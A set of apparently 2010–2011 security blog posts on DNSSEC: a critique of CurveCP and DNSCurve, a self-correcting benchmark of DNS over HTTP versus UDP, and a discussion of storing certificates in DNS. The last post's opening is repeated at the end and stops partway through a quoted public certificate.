There is a weird thing with CurveCP, though. DJB is proposing tunneling it over 53/udp. He’s not saying to route it through DNS proper, i.e. shunting all over CurveCP into the weird formats you have to use when proxying off a name server. He just wants data to move over 53/udp, because he thinks it gets through firewalls easier. Now, I haven’t checked into this in at least six years, but back when I was all into tunneling data over DNS, I actually had to tunnel data over DNS, i.e. fully emulate the protocol. Application Layer Gateways for DNS are actually quite common, as they’re a required component of any captive portal. I haven’t seen recent data, but I’d bet a fair amount that random noise over 53/udp will actually be blocked on more networks than random noise over some higher UDP port.

This is not an inherent aspect of CurveCP, though, just an implementation detail.


HTTPS Has 99 Problems But Speed Ain’t One

Unfortunately, my appreciation of CurveCP has to be tempered by the fact that it does not, in fact, solve our problems with HTTPS.  DJB seems thoroughly convinced that the reason we don’t have widespread HTTPS is because of performance issues.  He goes so far as to cite Google, which displays less imagery to the user if they’re using https://encrypted.google.com.

Source Material is a beautiful thing.  According to Adam Langley, who’s actually the TLS engineer at Google:

If there’s one point that we want to communicate to the world, it’s that SSL/TLS is not computationally expensive any more. Ten years ago it might have been true, but it’s just not the case any more. You too can afford to enable HTTPS for your users.

In January this year (2010), Gmail switched to using HTTPS for everything by default. Previously it had been introduced as an option, but now all of our users use HTTPS to secure their email between their browsers and Google, all the time. In order to do this we had to deploy no additional machines and no special hardware. On our production frontend machines, SSL/TLS accounts for less than 1% of the CPU load, less than 10KB of memory per connection and less than 2% of network overhead. Many people believe that SSL takes a lot of CPU time and we hope the above numbers (public for the first time) will help to dispel that.

If you stop reading now you only need to remember one thing: SSL/TLS is not computationally expensive any more.

Given that Adam is actually the engineer who wrote the generic C implementation of Curve25519, you’d think DJB would listen to his unambiguous, informed guidance. But no, talk after talk, con after con, DJB repeats the assertion that performance is why HTTPS is poorly deployed — and thus, we should throw out everything and move to his faster crypto function.

(He also suggests that by abandoning HTTPS and moving to CurveCP, we will somehow avoid the metaphorical attacker who has the ability to inject one packet, but not many, and doesn’t have the ability to censor traffic.  That’s a mighty fine hair to split.  For a talk that is rather obsessed with the goofiness of thinking partial defenses are meaningful, this is certainly a creative new security boundary.  Also, non-existent.)

I mentioned earlier: Security is larger than cryptography. If you’ll excuse the tangent, it’s important to talk about what’s actually going on.


There Is No “On Switch” For HTTPS

The average major website is not one website — it is an agglomeration, barely held together with links, scripts, images, ads, APIs, pages, duct tape, and glue.

For HTTPS to work, everything (except, as is occasionally argued, images) must come from a secure source. It all has to be secure, at the exact same time, or HTTPS fails loudly, and appropriately.

At this point, anyone who’s ever worked at a large company understands exactly, to a T, why HTTPS deployment has been so difficult. Coordination across multiple units is tricky even when there’s money to be made. When there isn’t money — when there’s merely defense against customer data being lost — it’s a lot harder.

The following was written in 2007, and was not enough to make Google start encrypting:

‘The goal is to identify the applications being used on the network, but some of these devices can go much further; those from a company like Narus, for instance, can look inside all traffic from a specific IP address, pick out the HTTP traffic, then drill even further down to capture only traffic headed to and from Gmail, and can even reassemble emails as they are typed out by the user.‘

Now, far be it from me to speculate as to what actually moved Google towards HTTPS, but it would be my suspicion that this had something to do with it:

Google is now encrypting all Gmail traffic from its servers to its users in a bid to foil sniffers who sit in cafes, eavesdropping in on traffic passing by, the company announced Wednesday.

The change comes just a day after the company announced it might pull its offices from China after discovering concerted attempts to break into Gmail accounts of human rights activists.

There is a tendency to blame the business guys for things. If only they cared enough! As I’ve said before, the business guys have blown hundreds of millions on failed X.509 deployments. They cared enough. The problems with existing trust distribution systems are (and I think DJB would agree with me here) not just political, but deeply, embarrassingly technical as well.


HTTPS Certificate Management Is Still A Problem!

Once upon a time, I wanted to write a kernel module. This module would quietly and efficiently add a listener on 443/TCP, that was just a mirror of 80/TCP. It would be like stunnel, but at native speeds.

But what certificate would it emit?

See, in HTTP, the client declares the host it thinks it’s talking to, so the server can “morph” to that particular identity. But in HTTPS, the server declares the host it thinks it is, so the client can decide whether to trust it or not.

This has been a problem, a known problem, since the late nineties. They even built a spec, called SNI (Server Name Indication), that allowed the client to “hint” to the server what name it was looking for.

Didn’t matter. There’s still not enough adoption of SNI for servers to vhost based off of it. So, if you want to deploy TLS, you not only have to get everybody, across all your organizations and all your partners and all your vendors and all your clients to “flip the switch”, but you also have to get them to renumber their networks.

Those are three words a network engineer never, ever, ever wants to hear.

And we haven’t even mentioned the fact that acquiring certificates is an out-of-organization acquisition, requiring interactions with outsiders for every new service that’s offered. Empirically, this is a fairly big deal. Devices sure don’t struggle to get IP addresses — but the contortions required to get a globally valid certificate into a device shipped to a company are epic and frankly impossible. To say nothing of what happens when one tries to securely host from a CDN (Content Distribution Network)!

DNSSEC, via its planned mechanisms for linking names to certificate hashes, bypasses this entire mess.  A hundred domains can CNAME to the same host, with the same certificate, within the CDN.  On arrival, the vhosting from the encapsulated HTTP layer will work as normal.  My kernel module will work fine.

‘Bout time we fixed that!

So. When I say security is larger than cryptography — it’s not that I’m saying cryptography is small. I’m saying that security, actual effective security, requires being worried about a heck of alot more failure modes than can fit into a one hour talk.


The Biggest Problem:   Zooko’s Triangle

I’ve saved my deepest concern for last.

I can’t believe DJB fell for Zooko’s Triangle.

So, I met Zooko about a decade ago.  I had no idea of his genius.  And yet, there he was, way back when, putting together the core of DJB’s talk at 27C3.  Zooko’s Triangle is a description of desirable properties of naming systems, of which only two can be implemented at any one time.  They are:

  1. Secure:  Only the actual owner of the name is found.
  2. Decentralized:  There is no “single point of failure” that everyone trusts to provide naming services
  3. Human Readable:  The name is such that humans can read it.

DJB begins by recapitulating Nyms, an idea that keeps coming up through the years:

“Nym” case: URL has a key!
Recognize magic number 123 in http://1238675309.twitter.com and extract key 8675309.
(Technical note: Keys are actually longer than this, but still fit into names.)

DJB shortens the names in his slides — and admits that he does this! But, man, they’re really ugly:

http://Z0z9dTWfhtGbQ4RoZ08e62lfUA5Db6Vk3Po3pP9Z8tM.twitter.com

I actually implemented something very similar in the part of Phreebird that links DNSSEC to the browser lock in your average web browser:

I didn’t invent this approach, though, and neither did DJB.  While I was personally inspired by the Self-Certifying File System, this is the “Secure and Decentralized — Not Human Readable” side of Zooko, so this shows up repeatedly.

For Phreebird, this was just a neat trick, something funny and maybe occasionally useful when interoperating with a config file or two.  It wasn’t meant to be used as anything serious.  Among other things, it has a fundamental UI problem — not simply that the names are hideous (though they are), but that they’ll necessarily be overridden.  People think bad security UI is random, like every once in a while the vapors come over a developer and he does something stupid.

No.  You can look at OpenSSH and say — keys will change over time, and users will have to have a way to override their cache.  You can look at curl and say — sometimes, you just have to download a file from an HTTPS link that has a bad cert.  There will be a user experience telling you not one, but two ways to get around certificate checking.

You can look at a browser and say, well, if a link to a page works but has the wrong certificate hash in the sending link, the user is just going to have to be prompted to see if they want to browse anyway.

It is tempting, then, to think bad security UI is inevitable, that there are no designs that could possibly avoid it.  But it is not the fact that keys change that force an alert.  It’s that they change, without the legitimate administrator having a way to manage the change.  IP addresses change all the time, and DNS makes it totally invisible.  Everybody just gets the new IPs — and there’s no notification, no warnings, and certainly no prompting.

Random links smeared all over the net will prompt like little square Christmas ornaments.  Keys stored in DNS simply won’t.

So DJB says, don’t deploy long names, instead use normal looking domains like www. Then, behind the scenes, using the DNS aliasing feature known as CNAME, link www to the full Nym.

Ignore the fact that there are applications actually using the CNAME data for meaningful things. This is very scary, very dangerous stuff.  After all, you can’t just trust your network to tell you the keyed identity of the node you’re attempting to reach.  That’s the whole point — you know the identity, the network is untrusted. DJB has something that — if comprehensively deployed, all the way to the root, does this.  DNSCurve, down from the root, down from com, down to twitter.com would in fact provide a chain of trust that would allow http://www.twitter.com to CNAME to some huge ugly domain.

Whether or not it’s politically feasible (it isn’t), it is a scheme that could work. It is secure.  It is human readable. But it is not decentralized — and DJB is petrified of trusted third parties.

And this, finally, is when it all comes off the rails.  DJB suggests that all software could perhaps ship with lists of keys of TLDs — .com, .de, etc.  Of course, such lists would have to be updated.

Never did I think I’d see one of the worst ideas from DNSSEC’s pre-root-signed past recycled as a possibility.  That this idea was actually called the ITAR (International Trust Anchor Repository), and that DJB was advocating ITAR, might be the most surreal experience of 2010 for me.

(Put simply, imagine every device, every browser, every phone FTP’ing updates from some vendor maintained server. It was a terrible idea when DNSSEC suggested it, and even they only did so under extreme duress.)

But it gets worse.  For, at the end of it, DJB simply through up his hands and said:

“Maybe P2P DNS can help.”

Now, I want to be clear (because I screwed this up at first):  DJB did not actually suggest retrieving key material from P2P DNS.  That’s good, because P2P DNS is the side of Zooko’s Triangle where you get decentralization and human readable names — but no security!  Wandering a cloud, asking if anyone knows the trusted key for Twitter, is an unimaginably bad idea.

No, he suggested some sort of split system, where you actually and seriously use URLs like http://Z0z9dTWfhtGbQ4RoZ08e62lfUA5Db6Vk3Po3pP9Z8tM.twitter.com to identify peers, but P2P DNS tells you what IPs to speak to them at.

What? Isn’t security important to you?

After an hour of hearing how bad DNSSEC must be, ending up here is…depressing.  In no possible universe are Nymic URLs a good idea for anything but wonky configuration entries.  DJB himself was practically apologizing for them. They’re not even a creative idea.


The Bottom Line:  It Really Is All About Key Management

No system can credibly purport to be solving the problems of authentication and encryption for anybody, let alone the whole Internet, without offering a serious answer to the question of Key Management.  To be blunt, this is the hard part. New transports and even new crypto are optimizations, possibly even very interesting ones. But they’re not where we’re bleeding.

The problem is that it’s very easy to give a node an IP address that anyone can route to, but very hard to give a node an identity that anybody can verify. Key Management — the creation, deletion, integration, and management of identities within and across organizational boundaries — this is where we need serious solutions.

Nyms are not a serious solution. Neither is some sort of strange half-TLD, half P2PDNS, split identity/routing hack. Solving key management is not actually optional. This is where the foundation of an effective solution must be found.

DNSSEC has a coherent plan for how keys can be managed across organizational boundaries — start at the root, delegate down, and use governance and technical constraints to keep the root honest. It’s worked well so far, or you wouldn’t be reading this blog post right now. There’s no question it’s not a perfect protocol — what is? — but the criticisms coming in from DJB are fairly weak (and unfairly old) in context, and the alternative proposed is sadly just smoke and mirrors without a keying mechanism.

Categories: Security

DNSSEC Interlude 1: Curiosities of Benchmarking DNS over Alternate Transports

January 4, 2011 Leave a comment

Short version:  DNS over TCP (or HTTP) is almost certainly not faster than DNS over UDP, for any definition of faster.  There was some data that supported a throughput interpretation of speed, but that data is not replicating under superior experimental conditions.  Thanks to Tom Ptacek for prodding me into re-evaluating my data.

Long version:

So one of the things I haven’t gotten a chance to write a diary entry about yet, is the fact that when implementing end-to-end DNSSEC, there will be environments in which arbitrary DNS queries just aren’t an option.  In such environments, we will need to find a way to tunnel traffic.

Inevitably, this leads us to HTTP, the erstwhile “Universal Tunneling Protocol”.

Now, I don’t want to go ahead and write up this entire concern now.  What I do want to do is discuss a particular criticism of this concern — that HTTP, being run over TCP, would necessarily be too slow in order to function as a DNS transport.

I decided to find out.

I am, at my core, an empiricist.  It’s my belief that the security community runs a little too much on rumor and nowhere nearly enough on hard, repeatable facts.  So, I have a strong bias towards actual empirical results.

One has to be careful, though — as they say, data is not information, information is not knowledge, and knowledge is not wisdom.

So, Phreebird is built on top of libevent, a fairly significant piece of code that makes it much easier to write fast network services.  (Libevent essentially abstracts away the complex steps it’s required to make modern kernel networking fast.)  Libevent supports UDP, TCP, and HTTP transports fairly elegantly, and even simultaneously, so I built each endpoint into Phreebird.

Then, I ran a simple benchmark.  From my Black Hat USA slides:

# DNS over UDP
./queryperf -d target2 -s 184.73.1.213 -l 10

Queries per second:   3278.676726 qps

# DNS over HTTP
ab -c 100 -n 10000 http://184.73.1.213/Rz8BAAABAAAAAAAAA3d3dwNjbm4DY29tAAABAAE=

Requests per second:    3910.13 [#/sec] (mean)

Now, at Black Hat USA, the title of my immediate next slide was “Could be Wrong!”, with the very first bullet point being “Paul Vixie thinks I am”, and the second point being effectively “this should work well enough, especially if we can retrieve entire DNS chains over a single query”.  But, aside from a few raised eyebrows, the point didn’t get particularly challenged, and I dropped the skepticism from the talk.  I mean, there’s a whole bunch of crazy things going on in the DKI talk, I’ve got more important things to delve deeply into, right?

Heh.

Turns out there’s a fair number of things wrong with the observation.  First off, saying “DNS over HTTP is faster than DNS over UDP” doesn’t specify which definition of faster I’m referring to. There are two.  When I say a web server is fast, it’s perfectly reasonable for me to say “it can handle 50,000 queries per second, which is 25% faster than its competition”.  That is speed-as-throughput.  But it’s totally reasonable also to say “responses from this web server return in 50ms instead of 500ms”, which is speed-as-latency.

Which way is right?  Well, I’m not going to go mealy-mouthed here.  Speed-as-latency isn’t merely a possible interpretation, it’s the normal interpretation.  And of course, since TCP adds a round trip between client and server, whereas UDP does not, TCP couldn’t be faster (modulo hacks that reduced the number of round trips at the application layer, anyway).  What I should have been saying was that “DNS servers can push more traffic over HTTP than they can over UDP.”

Except that’s not necessarily correct as well.

Now, I happen to be lucky.  I did indeed store the benchmarking data from my July 2010 experiment comparing UDP and HTTP DNS queries.  So I can show I wasn’t pulling numbers out of my metaphorical rear.  But I didn’t store the source code, which has long since been updated (changing the performance characteristics), and I didn’t try my tests on multiple servers of different performance quality.

I can’t go back in time and get the code back, but I can sure test Phreebird.  Here’s what we see on a couple of EC2 XLarges, after I’ve modified Phreebird to return a precompiled response rather than building packets on demand:

# ./queryperf -d bench -s x.x.x.x -l 10
Queries per second:   25395.728961 qps
# ab -c 1000 -n 100000 ‘http://x.x.x.x/.well-known/dns-http?v=1&q=wn0BAAABAAAAAAAABWJlbmNoBG1hcmsAAAEAAQ==’
Requests per second:    7816.82 [#/sec] (mean)

DNS over HTTP here is about 30% the performance of DNS over UDP.  Perhaps if I try some smaller boxes?

# ./queryperf -d bench -s pb-a.org -l 10
Queries per second:   7918.464171 qps
# ab -c 1000 -n 100000 ‘http://pb-a.org/.well-known/dns-http?v=1&q=wn0BAAABAAAAAAAABWJlbmNoBG1hcmsAAAEAAQ==’
Requests per second:    3486.53 [#/sec] (mean)

Well, we’re up to 44% the speed, but that’s a far cry from 125%.  What’s going on?  Not sure, I didn’t store the original data.  There’s a couple other things wrong:

  1. This is a conflated benchmark.  I should have a very small, tightly controlled, correctly written test case server and client.  Instead, I’m borrowing demonstration code that’s trying to prove where DNSSEC is going, and stock benchmarkers.
  2. I haven’t checked if Apache Benchmarker is reusing sockets for multiple queries (I don’t think it is).  If it is, that would mean it was amortizing setup time across multiple queries, which would skew the data.
  3. I’m testing between two nodes on the same network (Amazon).  I should be testing across a worldwide cluster.  Planetlab calls.
  4. I’m testing between two nodes, period.  That means that the embarrassingly parallelizable problem that is opening up a tremendous number of TCP client sockets, is borne by only one kernel instead of some huge number.  I’m continuing to repeat this error on the new benchmarks as well.
  5. This was a seriously counterintuitive result, and as such bore a particular burden to be released with hard, replicative data (including a repro script).

Now, does this mean the findings are worthless?  No.  First, there’s no intention of moving all DNS over HTTP, just those queries that cannot be serviced via native transport.  Slower performance — by any definition — is superior to no performance at all.  Second, there was at least one case where DNS over HTTP was 25% faster.  I don’t know where it is, or what caused it.  Tom Ptacek supposes that the source of HTTP’s advantage was that my UDP code was hobbled (specifically, through some half-complete use of libevent).  That’s actually my operating assumption for now.

Finally, and most importantly, as Andy Steingruebl tweets:

Most tests will prob show UDP faster, but that isn’t the point. Goal is to make TCP fast enough, not faster than UDP.

The web is many things, optimally designed for performance is not one of them.  There are many metrics by which we determine the appropriate technological solution.  Raw cycle-for-cycle performance is a good thing, but it ain’t the only thing (especially considering the number of problems which are very noticeably not CPU-bound).

True as that all is, I want to be clear. A concept was misunderstood, and even my “correct interpretation” wasn’t backed up by a more thorough and correct repetition of the experiment.  It was through the criticism of others (specifically, Tom Ptacek) that this came to light.  Thanks, Tom.

That’s science, folks.  It’s awesome, even when it’s inconvenient!

Categories: Security

The DNSSEC Diaries, Ch. 6: Just How Much Should We Put In DNS?

December 27, 2010 5 comments

Several years ago, I had some fun:  I streamed live audio, and eventually video, through the DNS.

Heh.  I was young, and it worked through pretty much any firewall.  (Still does, actually.)  It wasn’t meant to be a serious transport though.  DNS was not designed to traffic large amounts of data.  It’s a bootstrapper.

But then, we do a lot of things with protocols that we weren’t “supposed” to do.  Where do we draw the line?

Obviously DNS is not going to become the next great CDN hack (though I had a great trick for that too).  But there’s a real question:  How much data should we be putting into the DNS?

Somewhere between “only IP addresses, and only a small number”, and “live streaming video”, there’s an appropriate middle ground.  Hard to know where exactly that is.

There is a legitimate question of whether anything the size of a certificate should be stored in DNS.  Here is the size of Hotmail’s certificate, at the time of writing:

-----BEGIN CERTIFICATE-----
MIIHVTCCBj2gAwIBAgIKKykOkAAIAAHL8jANBgkqhkiG9w0BAQUFADCBizETMBEG
CgmSJomT8ixkARkWA2NvbTEZMBcGCgmSJomT8ixkARkWCW1pY3Jvc29mdDEUMBIG
CgmSJomT8ixkARkWBGNvcnAxFzAVBgoJkiaJk/IsZAEZFgdyZWRtb25kMSowKAYD
VQQDEyFNaWNyb3NvZnQgU2VjdXJlIFNlcnZlciBBdXRob3JpdHkwHhcNMTAxMTI0
MTYzNjQ1WhcNMTIxMTIzMTYzNjQ1WjBuMQswCQYDVQQGEwJVUzELMAkGA1UECBMC
V0ExEDAOBgNVBAcTB1JlZG1vbmQxEjAQBgNVBAoTCU1pY3Jvc29mdDEUMBIGA1UE
CxMLV2luZG93c0xpdmUxFjAUBgNVBAMTDW1haWwubGl2ZS5jb20wggEiMA0GCSqG
SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDVCWje/SRDef6Sad95esXcZwyudwZ8ykCZ
lCTlXuyl84yUxrh3bzeyEzERtoAUM6ssY2IyQBdauXHO9f+ZEz09mkueh4XmD5JF
/NhpxdpPMC562NlfvfH/f+8KzKCPhPlkz4DwYFHsknzHvyiz2CHDNffcCXT+Bnrv
G8eEPbXckfEFB/omArae0rrJ+mfo9/TxauxyX0OsKv99d0WO0AyWY2/Bt4G+lSuy
nBO7lVSadMK/pAxctE+ZFQM2nq3G4o+L95HeuG4m5NtIJnZ/7dZwc8HuXuMQTluA
ZL9iqR8a24oSVCEhTFjm+iIvXAgM+fMrjN4jHHj0Vo/o0xQ1kJLbAgMBAAGjggPV
MIID0TALBgNVHQ8EBAMCBLAwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB
MHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIA
gDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgB
ZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFNHp09bqrsUO36Nc
1mQgHqt2LeFiMB8GA1UdIwQYMBaAFAhC49tOEWbztQjFQNtVfDNGEYM4MIIBCgYD
VR0fBIIBATCB/jCB+6CB+KCB9YZYaHR0cDovL21zY3JsLm1pY3Jvc29mdC5jb20v
cGtpL21zY29ycC9jcmwvTWljcm9zb2Z0JTIwU2VjdXJlJTIwU2VydmVyJTIwQXV0
aG9yaXR5KDgpLmNybIZWaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9tc2Nv
cnAvY3JsL01pY3Jvc29mdCUyMFNlY3VyZSUyMFNlcnZlciUyMEF1dGhvcml0eSg4
KS5jcmyGQWh0dHA6Ly9jb3JwcGtpL2NybC9NaWNyb3NvZnQlMjBTZWN1cmUlMjBT
ZXJ2ZXIlMjBBdXRob3JpdHkoOCkuY3JsMIG/BggrBgEFBQcBAQSBsjCBrzBeBggr
BgEFBQcwAoZSaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9tc2NvcnAvTWlj
cm9zb2Z0JTIwU2VjdXJlJTIwU2VydmVyJTIwQXV0aG9yaXR5KDgpLmNydDBNBggr
BgEFBQcwAoZBaHR0cDovL2NvcnBwa2kvYWlhL01pY3Jvc29mdCUyMFNlY3VyZSUy
MFNlcnZlciUyMEF1dGhvcml0eSg4KS5jcnQwPwYJKwYBBAGCNxUHBDIwMAYoKwYB
BAGCNxUIg8+JTa3yAoWhnwyC+sp9geH7dIFPg8LthQiOqdKFYwIBZAIBCjAnBgkr
BgEEAYI3FQoEGjAYMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMBMIGuBgNVHREEgaYw
gaOCDyoubWFpbC5saXZlLmNvbYINKi5ob3RtYWlsLmNvbYILaG90bWFpbC5jb22C
D2hvdG1haWwubXNuLmNvbYINaG90bWFpbC5jby5qcIINaG90bWFpbC5jby51a4IQ
aG90bWFpbC5saXZlLmNvbYITd3d3LmhvdG1haWwubXNuLmNvbYINbWFpbC5saXZl
LmNvbYIPcGVvcGxlLmxpdmUuY29tMA0GCSqGSIb3DQEBBQUAA4IBAQC9trl32j6J
ML00eewSJJ+Jtcg7oObEKiSWvKnwVSmBLCg0bMoSCTv5foF7Rz3WTYeSKR4G72c/
pJ9Tq28IgBLJwCGqUKB8RpzwlFOB8ybNuwtv3jn0YYMq8G+a6hkop1Lg45d0Mwg0
TnNICdNMaHx68Z5TK8i9QV6nkmEIIYQ32HlwVX4eSmEdxLX0LTFTaiyLO6kHEzJg
CxW8RKsTBFRVDkZQ4CtxpvSV3OSJEEoHiJ++RiLZYY/1XRafwxqESMn+bGNM7aoE
NHJz3Uzu2/rSFQ5v7pmTpJokNcHl8hY1fCFs01PYkoWm0WXKYnDHL4+L46orvsyE
GM1PAYpIdTSp
-----END CERTIFICATE-----

Compared to the size of an IP address, this is a bit much.  There are three things that give me pause about pushing so much in.

First — and, yes, this is a personal bias — every time we try to put this much in DNS, we end up creating a new protocol in which we don’t.  There’s a dedicated RRTYPE for certificate storage, called CERT.  From what I can tell, the PGP community used CERT, and then migrated away.  There’s also the experience we can see in the X.509 realm, where they had many places where certificate chains were declared inline.  For various reasons, these in-protocol declarations were farmed out into URLs in which resources could be retrieved as necessary.  Inlining became a scalability blocker.

Operational experience is important.

Second, there’s a desire to avoid DNS packets that are too big to fit into UDP frames.  UDP, for User Datagram Protocol, is basically a thin application based wrapper around IP itself.  There’s no reliability and few features around it — it’s little more than “here’s the app I want to talk to, and here’s a checksum for what I was trying to say” (and the latter is optional).  When using UDP, there are two size points to be concerned with.

The first is (roughly) 512 bytes.  This is the traditional maximum size of a DNS packet, because it’s the traditional minimum size of a packet an IP network can be guaranteed to transmit without fragmentation en route.

The second is (roughly) 1500 bytes.  This is essentially how much you’re able to move over IP (and thus UDP) itself before your packet gets fragmented — generally immediately, because it can’t even get past the local Ethernet card.

There’s a strong desire to avoid IP fragmentation, as it has a host of deleterious effects.  If any IP fragment is dropped, the entire packet is lost.  So there’s “more swings at the bat” at having a fatal drop.  In the modern world of firewalls, fragmentation isn’t supported well as you can’t know whether to pass a packet until the entire thing has been reassembled.  I don’t think any sites flat out block fragmented traffic, but it’s certainly not something that’s optimized for.

Finally — and more importantly than anyone admits — fragmented traffic is something of a headache to debug.  You have to have reassembly in your decoders, and that can be slow.

However, we’ve already sort of crossed the rubicon here.  DNSSEC is many things, but small is not one of them.  The increased size of DNSSEC responses is not by any stretch of the imagination fatal, but it does end the era of tiny traffic.  This is made doubly true by the reality that, within the next five or so years, we really will need to migrate to keysizes greater than 1024.  I’m not sure we can afford 2048, though NIST is fairly adamant about that.  But 1024 is definitely the new 512.

That’s not to say that DNSSEC traffic will always fragment at UDP.  It doesn’t.  But we’ve accepted that DNS packets will get bigger with DNSSEC, and fairly extensive testing has shown that the world does not come to an end.

It is a reasonable thing to point out though , that while use of DNSSEC might lead to fragmentation, use of massive records in the multi-kilobyte range will, every time.

(There’s an amusing thing in DNSSEC which I’ll go so far as to say I’m not happy about.  There’s actually a bit, called DO, that says whether the client wants signatures.  Theoretically we could use this bit to only send DNSSEC responses to clients that are actually desiring signatures.  But I think somebody got worried that architectures would be built to only serve DNSSEC to 0.01% of clients — gotta start somewhere.  So now, 80% of DNS requests claim that they’ll validate DNSSEC.  This is…annoying.)

Now, there’s of course a better way to handle large DNS records than IP fragmenting:  TCP.  But TCP has historically been quite slow, both in terms of round trip time (there’s a setup penalty) and in terms of kernel resources (you have to keep sockets open).  But a funny thing happened on the way to billions of hits a day.

TCP stopped being so bad.

The setup penalty, it turns out, can be amortized across multiple queries.  Did you know that you can run many queries off the same TCP DNS socket, pretty much exactly like HTTP pipelines?  It’s true!  And as for kernel resources…

TCP stacks are now fast.  In fact — and, I swear, nobody was more surprised than me — when I built support for what I called “HTTP Virtual Channel” into Phreebird and LDNS, so that all DNS queries would be tunneled over HTTP, the performance impact wasn’t at all what I thought it would be:

DNS over HTTP is actually faster than DNS over UDP — by a factor of about 25%.  Apparently, a decade of optimising web servers has had quite the effect.  Of course, this requires a modern approach to TCP serving, but that’s the sort of thing libevent makes pretty straightforward to access.  (UPDATE:   TCP is reasonably fast, but it’s not UDP fast.  See here for some fairly gory details.) And it’s not like DNSSEC isn’t necessitating pretty deep upgrades to our name server infrastructure anyway.

So it’s hard to argue we shouldn’t have large DNS records, just because it’ll make the DNS packets better.  That ship has sailed.  There is of course the firewalling argument — you can’t depend on TCP, because clients may not support the transport.  I have to say, if your client doesn’t support TCP lookup, it’s just not going to be DNSSEC compliant.

Just part of compliance testing.  Every DNSSEC validator should in fact be making sure TCP is an available endpoint.

There’s a third argument, and I think it deserves to be aired.  Something like 99.9% of users are behind a DNS cache that groups their queries with other users.  On average, something like 90% of all queries never actually leave their host networks; instead they are serviced by data already in the cache.

Would it be fair for one domain to be monopolizing that cache?

This isn’t a theoretical argument.  More than a few major Top 25 sites have wildcard generated names, and use them.   So, when you look in the DNS cache, you indeed see huge amounts of throwaway domains.  Usually these domains have a low TTL (Time to Live), meaning they expire from cache quickly anyway.  But there are grumbles.

My sense is that if cache monopolization became a really nasty problem, then it would represent an attack against a name server.  In other words, if we want to say that it’s a bug for http://www.foo.com to populate the DNS cache to the exclusion of all others, then it’s an attack for http://www.badguy.com to be able to populate said cache to the same exclusion.  It hasn’t been a problem, or an attack I think, because it’s probably the least effective denial of service imaginable.

I could see future name servers tracking the popularity of cache entries before determining what to drop.  Hasn’t been needed yet, though.

Where this comes down to is — is it alright for DNS to require more resources?  Like I wrote earlier, we’ve already decided it’s OK for it to.  And frankly, no matter how much we shove into DNS, we’re never getting into the traffic levels that any other interesting service online is touching.  Video traffic is…bewilderingly high.

So do we end up with a case for shoving massive records into the DNS, and justifying it because a) DNSSEC does it and b) They’re not that big, relative to say Internet Video?  I have to admit, if you’re willing to “damn the torpedos” on IP Fragmentation or upgrading to TCP, the case is there.  And ultimately, the joys of a delegated namespace is that — it’s your domain, you can put whatever you want in there.

My personal sense is that while IP fragmentation / TCP upgrading / cache consumption isn’t the end of the world, it’s certainly worth optimizing against.  More importantly, operational experience that says “this plan doesn’t scale” shows up all over the place — and if there’s one thing we need to do more of, it’s to identify, respect, and learn from what’s failed before and what we did to fix it.

A lot of protocols end up passing URLs to larger resources, to be retrieved via HTTP, rather than embedding those resources inline.  In my next post, we’ll talk about what it might look like to push HTTP URLs into DNS responses.  And that, I think, will segue nicely into why I was writing a DNS over HTTP layer in the first place.

Several years ago, I had some fun:  I streamed live audio, and eventually video, through the DNS.

Heh.  I was young, and it worked through pretty much any firewall.  (Still does, actually.)  It wasn’t meant to be a

serious transport though.  DNS was not designed to traffic large amounts of data.  It’s a bootstrapper.

But then, we do a lot of things with protocols that we weren’t “supposed” to do.  Where do we draw the line?

Obviously DNS is not going to become the next great CDN hack (though I had a great trick for that *too*).  But there’s

a real question:  How much data should we be putting into the DNS?

Somewhere between “only IP addresses, and only a small number”, and “live streaming video”, there’s an appropriate

middle ground.  Hard to know where exactly that is.

There is a legitimate question of whether anything the size of a certificate should be stored in DNS.  Here is the

size of Hotmail’s certificate, at the time of writing:

—–BEGIN CERTIFICATE—–
MIIHVTCCBj2gAwIBAgIKKykOkAAIAAHL8jANBgkqhkiG9w0BAQUFADCBizETMBEG
CgmSJomT8ixkARkWA2NvbTEZMBcGCgmSJomT8ixkARkWCW1pY3Jvc29mdDEUMBIG
CgmSJomT8ixkARkWBGNvcnAxFzAVBgoJkiaJk/IsZAEZFgdyZWRtb25kMSowKAYD
VQQDEyFNaWNyb3NvZnQgU2VjdXJlIFNlcnZlciBBdXRob3JpdHkwHhcNMTAxMTI0
MTYzNjQ1WhcNMTIxMTIzMTYzNjQ1WjBuMQswCQYDVQQGEwJVUzELMAkGA1UECBMC
V0ExEDAOBgNVBAcTB1JlZG1vbmQxEjAQBgNVBAoTCU1pY3Jvc29mdDEUMBIGA1UE
CxMLV2luZG93c0xpdmUxFjAUBgNVBAMTDW1haWwubGl2ZS5jb20wggEiMA0GCSqG
SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDVCWje/SRDef6Sad95esXcZwyudwZ8ykCZ
lCTlXuyl84yUxrh3bzeyEzERtoAUM6ssY2IyQBdauXHO9f+ZEz09mkueh4XmD5JF
/NhpxdpPMC562NlfvfH/f+8KzKCPhPlkz4DwYFHsknzHvyiz2CHDNffcCXT+Bnrv
G8eEPbXckfEFB/omArae0rrJ+mfo9/TxauxyX0OsKv99d0WO0AyWY2/Bt4G+lSuy
nBO7lVSadMK/pAxctE+ZFQM2nq3G4o+L95HeuG4m5NtIJnZ/7dZwc8HuXuMQTluA
ZL9iqR8a24oSVCEhTFjm+iIvXAgM+fMrjN4jHHj0Vo/o0xQ1kJLbAgMBAAGjggPV
MIID0TALBgNVHQ8EBAMCBLAwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB
MHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIA
gDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgB
ZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFNHp09bqrsUO36Nc
1mQgHqt2LeFiMB8GA1UdIwQYMBaAFAhC49tOEWbztQjFQNtVfDNGEYM4MIIBCgYD
